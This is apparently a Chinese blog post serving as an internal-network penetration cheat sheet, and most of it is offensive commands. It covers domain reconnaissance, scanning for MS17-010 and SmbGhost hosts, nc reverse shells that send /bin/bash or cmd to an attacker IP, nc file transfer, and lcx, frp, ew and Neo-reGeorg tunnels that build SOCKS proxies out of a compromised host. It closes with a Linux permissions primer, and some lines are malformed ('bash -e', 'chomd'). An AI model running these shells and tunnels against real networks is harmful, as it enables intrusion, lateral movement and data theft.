内网渗透-信息搜集、漏扫、隧道、反弹shell

信息搜集

常规

uname -a
systeminfo 详细信息
netstat -ano 端口列表
route print 路由表
net start 启动服务
tasklist 进程列表
schtasks 计划任务
ipconfig /all 判断存在域
net view /domain 判断存在域
net time /domain 判断主域
netstat -ano 当前网络端口开放
nslookup 域名 追踪来源地址
wmic service list brief 查询本机服务
net config workstation  查询当前登录域及登录用户信息
wmic startup get command,caption 查看已启动的程序信息
whoami /all 用户权限
net config workstation 登录信息
net user 本地用户
net localgroup 本地用户组
net user /domain 获取域用户信息
net group /domain 获取域用户组信息
wmic useraccount get /all 涉及域用户详细信息
net group "Domain Admins" /domain 查询域管理员账户
net group "Enterprise Admins" /domain 查询管理员用户组
net group "Domain Controllers" /domain 查询域控制器

image

Nmap探测

存活ip

nmap -sP 172.23.40.1/24

存活ip端口

nmap -Pn -n --open 172.23.40.19/24

漏洞扫描

Ladon扫描

Ping 扫描C段存活主机(任意权限

win: 
Ladon64.exe 192.168.1.1/24 PingScan

ICMP 扫描C段存活主机(管理员权限

Linux: 
chmod +x frps
Ladon64 192.168.1.1/24 IcmpScan

SnmpScan (161.162端口)、T3Scan (WebLogic)、BannerScan (Web站点的Banner)、HttpTitle (Web站点标题)、TcpBanner (开放端口服务信息)

SMB 扫描C段永恒之蓝 MS17010 漏洞主机

Ladon64 192.168.1.1/24 MS17010

SMB 扫描C段永恒之黑 SmbGhost 漏洞主机

Ladon64 192.168.1.1/24 SmbGhost

Fscan扫描

扫描目标 C段,并输出到1.txt

./fscan -h 192.168.1.1/24 -o 1.txt

NC反弹shell

正向连接

Windows

客户端 主动连接服务器的端口

nc.exe -e cmd 192.168.0.18 4444

服务端 开放监听4444端口

nc.exe -lvvp 4444

监听端口是一个开放端口,它接受传入的数据包,并将它们转发到所需的目的应用程序/进程。监听端口并不意味着它被防火墙允许。监听端口仅仅意味着它正在接收某种流量。但是,该流量仍然可以被防火墙阻止。

反向连接

Linux

服务端 将cmd窗口反弹到4444端口

bash -e /bin/bash 172.23.40.132 4444
nc -e /bin/bash 172.23.40.132 4444

客户端 监听4444端口

nc.exe -lvp 4444

nc通信

服务端:

nc -lvvp 4444

客户端:

nc 192.168.0.16 4444

nc文件传输

服务端:

nc -l -p 4444 > test

客户端:

nc 192.168.0.16 4444 < 1.txt       #两种客户端必须同为一种操作系统

代理转发

正反代理

image
image

LCX代理

lcx.exe -listen 9999 192.168.1.4 80
lcx.exe -slave 192.168.1.3 9999 127.0.0.1 9999
lcx -listen 8888 -forward 192.168.0.10:3389
rdesktop 127.0.0.1:8888

Frp代理

简单来说就是frps用来接受数据包,frpc用来发送请求数据包)

正向代理

frps 客户端监听自己的7000端口

frps.ini配置内容
[common]
bind_port = 7000

攻击机运行frps.ini

chmod +x frps          //赋予用户文件的执行权限
./frps -c frps.ini

frpc 服务端连接客户端 7000端口

frpc.ini配置内容
[common]
server_addr = 服务端ip
server_port = 7000

[Socks5]
type = tcp
plugin = socks5
remote_port = 6000

失陷主机运行frpc

./frpc -c frpc.ini

此时,客户端间听的7000端口已经成功和服务器连接,同时开启了6000端口,并建立了socks5代理通道

谷歌配置socks5代理,服务端6000端口

端口映射

将本地3389端口映射到远程主机上的3389端口

frpc.ini

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port =3389

ew代理

一层内网

正向连接

目标网络边界存在公网IP且可任意开监听端口

在 1.1.1.1 主机上通过这个命令开启 8888 端口的 socks 代理

./ew -s ssocksd -l 8888

反向连接

目标网络边界不存在公网 IP,需要通过反弹方式创建 socks 代理

chmod 777 ew_for_linux64

让公网服务器监听6666和6667端口,等待攻击者机器访问6666端口,目标机器访问6667端口。

./ew_for_linux64 -s rcsocks -l 6666 -e 6667
//  1.1.1.1 的公网主机添加转接隧道,将 6666 收到的代理请求转交给反连 6667 端口的主机

内网机器执行

ew_for_Win.exe -s rssocks -d vps的ip -e 6667
// 将目标网络的可控边界主机反向连接公网主机

代理挂vps的6666端口

二重内网

2.2.2.3 主机上利用 ssocksd 方式启动 9999 端口的 socks 代理

./ew -s ssocksd -l 9999

将1080端口收到的socks代理请求转发给2.2.2.3的9999端口

./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999

Neo-reGeorg

反向代理

在当前目录生成文件夹neoreg_servers 里面有各种环境下的脚本

python neoreg.py generate -k adzuki 

将脚本上传到B主机并访问 /tunnel.aspx

python neoreg.py -k adzuki -u http://192.168.31.60/tunnel.aspx

设置代理服务器为 127.0.0.1:1080 socks5代理

判断出网

连通性检测:
1. TCP/UDP协议 nc命令
2. HTTP/HTTPS协议 curl命令
3. ICMP协议 ping命令
4. DNS协议 windows使用 nslookup  linux使用 dig

linux权限

读写执行

示例:drwxrwxr-x 8 root root 4096 6月 23 15:18 Simon
解析 "drwxrwxrwx",这个权限说明一共10位。

第一位代表文件类型,有两个数值:“d”和“-”,“d”代表目录,“-”代表非目录。
后面9位可以拆分为3组来看,分别对应不同用户:2-4位代表所有者user的权限说明,5-7位代表组群group的权限说明,8-10位代表其他人other的权限说明。
r代表可读权限,w代表可写权限,x代表可执行权限。

所以,“drwxrwxrwx” 表示所有用户都对这个目录有可读可写可执行权限。

修改权限

r:读取权限,数字代号为:"4"。
w:写入权限,数字代号为:"2"。
x:执行或切换权限,数字代号为:"1"。

chmod 777 test    //给test这个目录赋予所有人可读可写可执行权限,4+2+1=7

u 代表拥有者(user)
g 代表拥有者所在的组群(group)
o 代表其他用户,但不是u和g (other)
a 代表全部的人,也就是包括u,g和o
+:为文件或目录增加权限
-:删除文件或目录的权限
=:设置指定的权限

示例:
chomd u+wx test 增加test目录中拥有者可写和可执行的权限
chomd g+wx test 增加test目录中拥有者所在的组群可写和可执行的权限
chmod go-rw test 删除test目录中组群和其他用户的可读和可写的权限

除了符号,也可以使用八进制数字来指定具体权限,如下表所示:
0:没有任何权限 :---
1:执行权限 :--x
2:写入权限 :-w-
3:执行权限和写入权限:1 (执行) + 2 (写入) = 3 :-wx
4:读取权限 :r--
5:读取和执行权限:4 (读取) + 1 (执行) = 5 :r-x
6:读取和写入权限:4 (读取) + 2 (写入) = 6 :rw-
7:所有权限: 4 (读取) + 2 (写入) + 1 (执行) = 7 :rwx

示例:
-rw——- (600) 只有所有者才有读和写的权限
-rw-r–r– (644) 只有所有者才有读和写的权限,组群和其他人只有读的权限
-rwx—— (700) 只有所有者才有读,写,执行的权限
-rwxr-xr-x (755) 只有所有者才有读,写,执行的权限,组群和其他人只有读和执行的权限
-rwx–x–x (711) 只有所有者才有读,写,执行的权限,组群和其他人只有执行的权限
-rw-rw-rw- (666) 每个人都有读写的权限
posted @   LinkPoc  阅读(224)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· 百万级群聊的设计实践
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战
· 永远不要相信用户的输入:从 SQL 注入攻防看输入验证的重要性
点击右上角即可分享
微信分享提示